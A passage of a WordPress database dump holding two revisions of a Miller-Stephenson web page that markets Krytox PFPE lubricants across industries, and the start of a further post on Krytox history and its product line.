Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 18:03:03', '2016-09-28 18:03:03', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2104, 2, '2016-09-28 18:04:23', '2016-09-28 18:04:23', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n<a href="#bearings">BEARINGS</a>\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 18:04:23', '2016-09-28 18:04:23', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2106, 1, '2016-09-28 18:21:29', '2016-09-28 18:21:29', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of 